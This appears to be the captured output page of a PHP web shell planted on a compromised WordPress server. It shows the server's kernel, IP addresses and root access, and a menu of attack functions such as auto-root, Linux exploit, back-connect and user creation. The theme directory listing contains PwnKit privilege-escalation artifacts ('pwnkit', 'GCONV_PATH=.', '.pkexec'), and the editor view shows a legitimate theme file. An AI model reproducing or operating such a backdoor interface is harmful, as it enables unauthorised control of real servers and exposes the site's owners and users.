Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
inselect /
wp-content /
themes /
phlox /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
auxin
[ DIR ]
drwxrwxrwx
auxin-content
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
languages
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
woocommerce
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README.txt
53.08
KB
-rwxrwxrwx
archive.php
1.61
KB
-rwxrwxrwx
comments.php
5.27
KB
-rwxrwxrwx
footer.php
436
B
-rwxrwxrwx
functions.php
816
B
-rwxrwxrwx
header.php
1.09
KB
-rwxrwxrwx
index.php
1.81
KB
-rwxrwxrwx
package-lock.json
685.47
KB
-rwxrwxrwx
page.php
1010
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
rtl.css
59.56
KB
-rwxrwxrwx
screenshot.png
1.46
MB
-rwxrwxrwx
search.php
864
B
-rwxrwxrwx
searchform.php
552
B
-rwxrwxrwx
sidebar-footer.php
3.22
KB
-rwxrwxrwx
sidebar-primary.php
3.42
KB
-rwxrwxrwx
sidebar-secondary.php
1.91
KB
-rwxrwxrwx
sidebar.php
193
B
-rwxrwxrwx
single.php
1.61
KB
-rwxrwxrwx
style.css
1.69
KB
-rwxrwxrwx
taxonomy.php
1016
B
-rwxrwxrwx
wpml-config.xml
2.53
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar-footer.php
<?php /** * The footer sidebar widget area is triggered if any of the areas have widgets. * * * @package Auxin * @author averta (c) 2014-2022 * @link http://averta.net */ if ( 'default' === $use_legacy_footer = auxin_get_post_meta( $post, 'page_footer_use_legacy', 'default' ) ) { $use_legacy_footer = auxin_get_option('site_footer_use_legacy'); } if ( ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'auxin_subfooter' ) ) && ! ( function_exists('hfe_footer_enabled') && hfe_footer_enabled() ) && ! ( class_exists( '\Elementor\Plugin' ) && ! auxin_is_true( $use_legacy_footer ) ) ) { if( auxin_get_option('show_subfooter_bar') || is_customize_preview() ) { $layout = auxin_get_option('subfooter_bar_layout'); ?> <aside class="aux-subfooter-bar <?php echo esc_attr( $layout ); ?>"> <div class="aux-wrapper"> <div class="aux-container <?php echo esc_attr( in_array( $layout, array( 'vertical-none-boxed', 'vertical-small-boxed' ) ) ? 'aux-fold' : '' ); ?>"> <div class="aux-widget-area"> <?php if( is_active_sidebar( 'auxin-subfooter-bar-widget-area' ) ){ dynamic_sidebar( 'auxin-subfooter-bar-widget-area' ); } ?> </div> </div> </div> </aside> <?php } if( 'default' === $display_subfooter = auxin_get_post_meta( $post, 'page_show_subfooter', 'default') ){ $display_subfooter = auxin_get_option( 'show_subfooter', '1' ); } if( auxin_is_true( $display_subfooter ) ) { // class names for subfooter $classes = array(); $classes[] = auxin_get_option ( 'footer_widget_dark_mode' ) ? 'aux-dark': ''; $classes[] = auxin_get_option ( 'subfooter_hide_on_tablet') ? 'aux-tablet-off' : ''; $classes[] = auxin_get_option ( 'subfooter_hide_on_phone' ) ? 'aux-phone-off' : ''; ?> <aside <?php echo auxin_make_html_class_attribute( $classes, 'subfooter aux-subfooter' ); ?>> <div class="aux-wrapper"> <div class="aux-container aux-fold"> <div class="aux-row"> <?php $layout = auxin_get_option( 'subfooter_layout' ); $grid_cols = explode( '_', $layout); $col_nums = count( $grid_cols ); for ( $i = 1; $i <= $col_nums; $i++ ) { $grid_tablet_class = 'aux-tb-' . ( $col_nums > 2 ? 3 : $col_nums ); ?> <div class="aux-widget-area <?php echo 'aux-' . esc_attr( $grid_cols[ $i-1 ] ) . ' ' . esc_attr( $grid_tablet_class ); ?> aux-mb-1"> <?php if ( is_active_sidebar( 'auxin-footer'.$i.'-sidebar-widget-area' ) ) { dynamic_sidebar( 'auxin-footer'.$i.'-sidebar-widget-area' ); } ?> </div> <?php } ?> </div> </div><!-- end of container --> <?php do_action('auxin_in_the_subfooter'); ?> </div><!-- end of wrapper --> </aside><!-- end footer widget --> <?php } }
Close